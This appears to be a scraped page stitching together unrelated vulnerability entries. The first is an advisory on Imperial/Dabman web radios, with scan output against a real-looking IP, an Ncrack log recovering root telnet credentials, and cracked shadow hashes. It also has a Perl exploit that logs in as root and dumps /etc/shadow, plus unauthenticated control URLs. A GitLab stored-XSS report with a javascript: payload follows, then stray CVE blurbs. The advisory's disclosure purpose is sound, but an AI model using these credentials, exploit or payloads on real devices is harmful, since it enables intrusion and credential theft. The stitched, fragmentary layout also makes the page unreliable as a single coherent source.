R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host) Initiating OS detection (try #1) against R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) NSE: Script scanning 93.234.141.215. Initiating NSE at 14:48 Completed NSE at 14:49, 30.61s elapsed Initiating NSE at 14:49 Completed NSE at 14:49, 0.00s elapsed Nmap scan report for R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet security DVR telnetd (many brands) 80/tcp open tcpwrapped |\_http-title: AirMusic 8080/tcp open http BusyBox httpd 1.13 | http-methods: |\_ Supported Methods: GET |\_http-title: 404 Not Found MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux\_kernel:2.6 OS details: Linux 2.6.16 - 2.6.35 (embedded) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=197 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel NCrack \[telnetd\] (ncrack -v --user root \[IP\]:\[PORT\]) C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23 Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21 Mitteleuropõische Sommerzeit Discovered credentials on telnet://93.234.141.215:23 'root' 'password' Discovered credentials on telnet://93.234.141.215:23 'root' 'password1' Discovered credentials on telnet://93.234.141.215:23 'root' 'password2' Discovered credentials on telnet://93.234.141.215:23 'root' 'password123' Discovered credentials on telnet://93.234.141.215:23 'root' 'password12' Discovered credentials on telnet://93.234.141.215:23 'root' 'password3' Discovered credentials on telnet://93.234.141.215:23 'root' 'password!' telnet://93.234.141.215:23 finished. Too many failed attemps. Discovered credentials for telnet on 93.234.141.215 23/tcp: 93.234.141.215 23/tcp telnet: 'root' 'password' 93.234.141.215 23/tcp telnet: 'root' 'password1' 93.234.141.215 23/tcp telnet: 'root' 'password2' 93.234.141.215 23/tcp telnet: 'root' 'password123' 93.234.141.215 23/tcp telnet: 'root' 'password12' 93.234.141.215 23/tcp telnet: 'root' 'password3' 93.234.141.215 23/tcp telnet: 'root' 'password!' Ncrack done: 1 service scanned in 273.29 seconds. Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117 Ncrack finished. System: BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) Kernel: 9)20151217\_M8\_TFT\_7601\_Kernel OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini. rodata.ARM.extab.ARM.exidx.eh\_frame.init\_array. fini\_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes Built-in commands: . : \[ \[\[ bg break cd chdir continue echo eval exec exit export false fg hash help jobs kill local printf pwd read readonly return set shift source test times trap true type ulimit umask unset wait Currently defined functions: \[, \[\[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput, gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc, login, ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route, run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc, udhcpd, umount, unlzma, usleep, zcat Username: root Password: password & password! shadow root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey) ftp:!:0:::::: (decrypted: empty/blank) usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond) gshadow root:::root,mldonkey PoC: Exploit use Net::Telnet (); use Cwd; $file="inputLog.txt"; $ofile="outputlog.txt"; # For local network change to localhost or local ip @hosts = ("93.234.141.215"); foreach $hostip (sort @hosts) { $t = new Net::Telnet (Timeout => 10, Input\_log => $file, Prompt => "/>/"); print "nnConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...n"; print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600n"; $t->open("$hostip"); $t->login("root","password"); my @lines = $t->cmd('cat /etc/shadow'); print "$hostip: Directories:n"; print "@lines n"; $t->close; } 1.2 AirMusic Unauthenticated Command Execution (httpd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. AirMusic Status Interface: http://93.234.141.215:80 Web-Server HTTPD UIData Path: http://93.234.141.215:8080 Note: Attacks can be performed in the local network (Localhost:80) or remotly by requesting the url remote ip adress (93.234.141.215) + forwarded remote port(Standard :23). Get device name from Device http://93.234.141.215:80/irdevice.xml Set device name http://93.234.141.215:80/set\_dname?name=PWND Set boot-logo (HTTP URL, requirement: JPG) http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg Display or retrieve channel logo http://93.234.141.215:80:8080/playlogo.jpg Changing the main menu with the selected language http://93.234.141.215:80/init?language=us Play stream http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME Save audio file as message http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1 Recall channel hotkeys http://93.234.141.215:80/hotkeylist Current playback data http://93.234.141.215:80/playinfo Set volume from 0-31 & mute function http://93.234.141.215:80/setvol?vol=10&mute=0 Reset http://93.234.141.215:80/back Set stop http://93.234.141.215:80/stop Activate all back http://93.234.141.215:80/exit Send keystroke combo http://93.234.141.215:80/Sendkey?key=3 PoC: Exploit Dabman & Imerpial - HTML AutoPwner PoC: Checker for Modifications #!/usr/bin/perl use strict; use warnings; use LWP::Simple; my $url1 = 'http://93.234.141.215:80/'; my $source1 = get( $url1 ); my $url2 = 'http://93.234.141.215:80/'; my $source2 = get( $url2 ); print $source1; print $source1; Solution - Fix & Patch: ======================= A fresh updated version is available by the manufacturer telestar digital gmbh to resolve the vulnerabilities in all i & d series products. It is recommended to install the updates as quick as possible to ensure the digital security. Manual steps to update: 1. Set the device to the factory setting 2. Select language 3. Switch off the device 4. Switch on the device 5. Network setup 6. Wait for "New Software" message 7. Press OK to start the update 8. Updated Version: TN81HH96-g102h-g103\*\*a\*-fb21a-3624 Security Risk: ============== The security risk of the vulnerabilities in the online web radio with wifi and user interface are estimated as critical. The vulnerability can be exploited by local attackers in a network or by remote attackers without user interaction or further privileged user accounts. The potential of the issue being exploited in thousends of end user devices all over europe is estimated as high. The issue has the potential that could be used by remote attackers for spreading randomware / malware, mass defacements, compromises for further linux network attacks or being part of a criminal acting iot botnet. Credits & Authors: ================== Benjamin K.M. \[VULNERABILITY LAB - CORE RESEARCH TEAM\] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln\_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss\_upcoming.php vulnerability-lab.com/rss/rss\_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

CVE-2019-13474: Dabman & Imerpial - HTML AutoPwner

SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file.

CVE-2019-16294: Scintilla

An input validation and output encoding issue was discovered in the GitLab CE/EE wiki pages feature which could result in a persistent XSS. This vulnerability was addressed in 12.1.2, 12.0.4, and 11.11.6.

Skip to content

Open Issue created Apr 06, 2019 by **GitLab SecurityBot@gitlab-securitybot**Reporter

**Stored XSS in Wiki pages**

**HackerOne report #526325** by ryhmnlfj on 2019-04-04, assigned to hackerjuan:

**Summary**

I found Stored XSS using Wiki-specific Hierarchical link Markdown in Wiki pages.

**Steps to reproduce**

1.  Sign in to GitLab.
2.  Open a Project page that you have permission to edit Wiki pages.
3.  Open Wiki page.
4.  Click "New page" button.
5.  Fill out "Page slug" form with javascript:.
6.  Click "Create page" button.
7.  Fill out the each form as follows:  
    Title: javascript:  
    Format: Markdown  
    Content: [XSS](.alert(1);)  
    (Please see "CreatePage.png")  
    
8.  Click "Create page" button.
9.  Click "XSS" link in created page.

**What is the current _bug_ behavior?**

The alert dialog appears after clicking "XSS" link in created page.  
Please see "Result\_Firefox.png".  

**Description In Detail:**

GitLab application converts the Markdown string .alert(1); to the href attribute javascript:alert(1);.  
Furthermore, Wiki-specific Markdown string . is converted to javascript: in this case.

**What is the expected _correct_ behavior?**

The dangerous href attribute javascript:alert(1); should be filtered.  
A safe HTTP/HTTPS link should be rendered instead.

**Additional Informations:**

1.  In the above case, another Wiki-specific Markdown string .. is also converted to javascript:.
    
2.  Using Title string such as javascript:STRING_EXPECTED_REMOVING also reproduces this vulnerability.  
    For example, if a wiki page is created with a disguised Title string JavaScript::SubClassName.function_name, GitLab application converts Wiki-specific Markdown string . to JavaScript: in such page.  
    It seems that GitLab application recognizes scheme-like string JavaScript: and removes the rest of Title string :SubClassName.function_name.
    
3.  An attacker can use various schemes by replacing Title string javascript: to other scheme. (e.g. data:, vbscript:, and so on.)
    

**Output of checks**

This bug happens on the official Docker installation of GitLab Enterprise Edition 11.9.4-ee.

**Results of GitLab environment info**

Output of sudo gitlab-rake gitlab:env:info:

    System information  
    System:		  
    Proxy:		no  
    Current User:	git  
    Using RVM:	no  
    Ruby Version:	2.5.3p105  
    Gem Version:	2.7.6  
    Bundler Version:1.16.6  
    Rake Version:	12.3.2  
    Redis Version:	3.2.12  
    Git Version:	2.18.1  
    Sidekiq Version:5.2.5  
    Go Version:	unknown
    
    GitLab information  
    Version:	11.9.4-ee  
    Revision:	55be7f0  
    Directory:	/opt/gitlab/embedded/service/gitlab-rails  
    DB Adapter:	postgresql  
    DB Version:	9.6.11  
    URL:		http://gitlab.example.com  
    HTTP Clone URL:	http://gitlab.example.com/some-group/some-project.git  
    SSH Clone URL:	git@gitlab.example.com:some-group/some-project.git  
    Elasticsearch:	no  
    Geo:		no  
    Using LDAP:	no  
    Using Omniauth:	yes  
    Omniauth Providers: 
    
    GitLab Shell  
    Version:	8.7.1  
    Repository storage paths:  
    - default: 	/var/opt/gitlab/git-data/repositories  
    GitLab Shell path:		/opt/gitlab/embedded/service/gitlab-shell  
    Git:		/opt/gitlab/embedded/bin/git  

**Impact**

If wiki pages created by using this vulnerability are visible to everyone (Wiki Visibility setting is set to "Everyone With Access") in "Public" project, there is a possibility that a considerable number of GitLab users and visitors click a malicious link.

**Attachments**

**Warning:** Attachments received through HackerOne, please exercise caution!

*   CreatePage.png
*   Result\_Firefox.png

CVE-2019-5467: Stored XSS in Wiki pages (#60143) · Issues · GitLab.org / GitLab FOSS · GitLab

The rsvpmaker plugin before 6.2 for WordPress has SQL injection.

CVE-2019-15646: RSVPMaker

The cforms2 plugin before 14.6.10 for WordPress has SQL injection.

Tag

#redis